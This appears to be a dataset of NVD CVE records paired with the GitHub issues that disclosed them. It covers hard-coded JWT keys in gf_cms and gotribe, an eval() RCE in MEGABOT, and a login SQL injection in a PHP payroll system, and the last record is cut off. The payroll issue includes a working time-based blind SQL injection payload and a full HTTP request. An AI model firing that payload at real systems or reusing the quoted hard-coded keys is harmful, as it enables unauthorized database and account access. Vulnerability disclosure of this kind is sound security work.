[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/demozx/gf_cms/commit/be702ada7cb6fdabc02689d90b38139c827458a5" }, { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/demozx/gf_cms/commit/de51cc57a96ccca905c837ef925c2cc3a5241383" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/demozx/gf_cms/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/demozx/gf_cms/issues/5#issuecomment-2296590417" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275199" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275199" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.393981" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:demozx:gf_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "52F0EE72-5D7B-4635-8319-3BC72516D597", "versionEndExcluding": "1.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/demozx/gf_cms/issues/5#issuecomment-2296590417
[ "Issue Tracking" ]
github.com
[ "demozx", "gf_cms" ]
func init() { service.RegisterAuth(New()) auth := jwt.New(&jwt.GfJWTMiddleware{ Realm: "test zone", Key: []byte("secret key"), Timeout: time.Minute * 5, MaxRefresh: time.Minute * 5, IdentityKey: "id", TokenLookup: "header: Authorization, query: token, cookie: jwt", TokenHeadName: "Bearer", TimeFunc: time.Now, Authenticator: Auth().Authenticator, Unauthorized: Auth().Unauthorized, PayloadFunc: Auth().PayloadFunc, IdentityHandler: Auth().IdentityHandler, }) authService = auth } In file ` internal/logic/auth/auth. ` line 37, there is a hard coded Key (Key) value, namely the "secret Key". Hard-coded credentials (such as keys, passwords, API keys, etc.) are one of the common mistakes of security development. If an attacker has access to these hard-coded credentials, they may be able to exploit them Data to access a system or service. Hard-coded credentials often lead to security risks because they make it easier for attackers to obtain sensitive information and potentially use it to perform malicious activities.
Hardcoded Secret Key in JWT Authentication Initialization
https://api.github.com/repos/demozx/gf_cms/issues/5/comments
1
2024-08-19T12:40:20Z
2024-09-02T03:04:53Z
https://github.com/demozx/gf_cms/issues/5
2,473,263,608
5
6,206
CVE-2024-43404
2024-08-20T15:15:23.867
MEGABOT is a fully customized Discord bot for learning and fun. The `/math` command and functionality of MEGABOT versions < 1.5.0 contains a remote code execution vulnerability due to a Python `eval()`. The vulnerability allows an attacker to inject Python code into the `expression` parameter when using `/math` in any Discord channel. This vulnerability impacts any discord guild utilizing MEGABOT. This vulnerability was fixed in release version 1.5.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/NicPWNs/MEGABOT/commit/71e79e5581ea36313700385b112d863053fb7ed6" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/NicPWNs/MEGABOT/issues/137" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/NicPWNs/MEGABOT/pull/138" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes" ], "url": "https://github.com/NicPWNs/MEGABOT/releases/tag/v1.5.0" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/NicPWNs/MEGABOT/security/advisories/GHSA-vhxp-4hwq-w3p2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:megacord:megabot:*:*:*:*:*:*:*:*", "matchCriteriaId": "F3BDF1BF-C31D-4E71-AD47-05CBA3B7FD60", "versionEndExcluding": "1.5.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/NicPWNs/MEGABOT/issues/137
[ "Issue Tracking" ]
github.com
[ "NicPWNs", "MEGABOT" ]
There is a Remote Code Execution (RCE) vulnerability in the `/math` functionality of the bot.
RCE Vulnerability
https://api.github.com/repos/NicPWNs/MEGABOT/issues/137/comments
1
2024-08-19T22:25:34Z
2024-08-19T22:43:34Z
https://github.com/NicPWNs/MEGABOT/issues/137
2,474,339,698
137
6,207
CVE-2024-8081
2024-08-22T22:15:05.510
A vulnerability classified as critical was found in itsourcecode Payroll Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/ppp-src/ha/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://itsourcecode.com/" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275563" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.275563" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.396110" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kevinwong:payroll_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "493685F6-0114-46FA-A25F-7B05A7D5ACDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/ha/issues/6
[ "Exploit", "Issue Tracking" ]
github.com
[ "ppp-src", "ha" ]
# Itsourcecode "Payroll Management System " in PHP 1.0 "login.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Payroll Management System ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-food-ordering-system-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + tornseck ## Vulnerable File + login.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2019/04/bookstoragesystem.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'order.php' file of the 'Payroll Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "username" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Payroll Management System", "xxx" discovered a critical SQL injection vulnerability in the "order.php" file. This vulnerability stems from insufficient user input validation of the "user" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /ajax.php?action=login HTTP/1.1 Host: 192.168.1.108:96 Content-Length: 21 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.108:96 Referer: http://192.168.1.108:96/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=lpqq2adhvnpc9800mplg0j61ic Connection: close username=1&password=1 --- ## Vulnerability type: + time-based blind ## Vulnerability location: + 'username' parameter ## Payload: --- -Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=1' AND (SELECT 8289 FROM (SELECT(SLEEP(5)))PPIz) AND 'Dwrx'='Dwrx&password=1 --- +![1](https://github.com/user-attachments/assets/1fa34ada-8150-4504-a8e1-0dc2945e98b6) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: +![2](https://github.com/user-attachments/assets/3cb2d4bc-55d6-47f9-8d2e-893acf2d337e) +![3](https://github.com/user-attachments/assets/0f7954ce-31b2-446b-9d07-0fde439ad0f0) +![4](https://github.com/user-attachments/assets/72dde97b-927e-49d3-847e-f3f63b81cc46) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# Itsourcecode "Payroll Management System " in PHP 1.0 "login.php" SQL injection
https://api.github.com/repos/ppp-src/ha/issues/6/comments
1
2024-08-22T07:06:36Z
2024-08-24T14:22:27Z
https://github.com/ppp-src/ha/issues/6
2,480,007,118
6
6,208
CVE-2024-8135
2024-08-24T22:15:13.827
A vulnerability classified as critical has been found in Go-Tribe gotribe up to cd3ccd32cd77852c9ea73f986eaf8c301cfb6310. Affected is the function Sign of the file pkg/token/token.go. The manipulation of the argument config.key leads to hard-coded credentials. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as 4fb9b9e80a2beedd09d9fde4b9cf5bd510baf18f. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "ADJACENT", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/Go-Tribe/gotribe/commit/4fb9b9e80a2beedd09d9fde4b9cf5bd510baf18f" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe/issues/1#issuecomment-2307205980" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275706" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?id.275706" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.396310" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gotribe:gotribe:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F46A939-AF95-4372-9A2A-CBC91D96B52A", "versionEndExcluding": "2024-08-23", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/Go-Tribe/gotribe/issues/1
[ "Issue Tracking" ]
github.com
[ "Go-Tribe", "gotribe" ]
pkg/token/token.go ```Go var ( config = Config{"Rtg8BPKNEf2mB4mgvKONGPZZQSaJWNLijxR42qRgq0iBb5", "identityKey"} once sync.Once ) ........... ........... // Sign 使用 jwtSecret 签发 token,token 的 claims 中会存放传入的 subject. func Sign(identityKey string) (tokenString string, err error) { // Token 的内容 token := jwt.NewWithClaims(jwt.SigningMethodHS256, jwt.MapClaims{ config.identityKey: identityKey, "nbf": time.Now().Unix(), "iat": time.Now().Unix(), "exp": time.Now().Add(100000 * time.Hour).Unix(), }) // 签发 token tokenString, err = token.SignedString([]byte(config.key)) return } ``` In line 94 of the file 'pkg/token/token.go', hard-coded credentials (config.key) are used. This means that the key is written directly in the code or is provided to the program in some other way (such as a configuration file or environment variable). Hard-coded credentials are a very serious security risk because anyone who has access to the code or configuration can get hold of this key, potentially leading to unauthorized access or action. In addition, if the codebase is compromised or obtained by an attacker, hard-coded keys can also be used to forge legitimate tokens or other sensitive operations.
Use of Hard-coded Credentials in token.go
https://api.github.com/repos/Go-Tribe/gotribe/issues/1/comments
1
2024-08-22T08:59:40Z
2024-08-23T14:25:19Z
https://github.com/Go-Tribe/gotribe/issues/1
2,480,223,072
1
6,209
CVE-2024-8135
2024-08-24T22:15:13.827
A vulnerability classified as critical has been found in Go-Tribe gotribe up to cd3ccd32cd77852c9ea73f986eaf8c301cfb6310. Affected is the function Sign of the file pkg/token/token.go. The manipulation of the argument config.key leads to hard-coded credentials. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as 4fb9b9e80a2beedd09d9fde4b9cf5bd510baf18f. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "ADJACENT", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/Go-Tribe/gotribe/commit/4fb9b9e80a2beedd09d9fde4b9cf5bd510baf18f" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe/issues/1#issuecomment-2307205980" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275706" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?id.275706" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.396310" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gotribe:gotribe:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F46A939-AF95-4372-9A2A-CBC91D96B52A", "versionEndExcluding": "2024-08-23", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/Go-Tribe/gotribe/issues/1#issuecomment-2307205980
[ "Issue Tracking" ]
github.com
[ "Go-Tribe", "gotribe" ]
pkg/token/token.go ```Go var ( config = Config{"Rtg8BPKNEf2mB4mgvKONGPZZQSaJWNLijxR42qRgq0iBb5", "identityKey"} once sync.Once ) ........... ........... // Sign 使用 jwtSecret 签发 token,token 的 claims 中会存放传入的 subject. func Sign(identityKey string) (tokenString string, err error) { // Token 的内容 token := jwt.NewWithClaims(jwt.SigningMethodHS256, jwt.MapClaims{ config.identityKey: identityKey, "nbf": time.Now().Unix(), "iat": time.Now().Unix(), "exp": time.Now().Add(100000 * time.Hour).Unix(), }) // 签发 token tokenString, err = token.SignedString([]byte(config.key)) return } ``` In line 94 of the file 'pkg/token/token.go', hard-coded credentials (config.key) are used. This means that the key is written directly in the code or is provided to the program in some other way (such as a configuration file or environment variable). Hard-coded credentials are a very serious security risk because anyone who has access to the code or configuration can get hold of this key, potentially leading to unauthorized access or action. In addition, if the codebase is compromised or obtained by an attacker, hard-coded keys can also be used to forge legitimate tokens or other sensitive operations.
Use of Hard-coded Credentials in token.go
https://api.github.com/repos/Go-Tribe/gotribe/issues/1/comments
1
2024-08-22T08:59:40Z
2024-08-23T14:25:19Z
https://github.com/Go-Tribe/gotribe/issues/1
2,480,223,072
1
6,210
CVE-2024-8139
2024-08-25T01:15:11.300
A vulnerability has been found in itsourcecode E-Commerce Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file search_list.php. The manipulation of the argument user leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 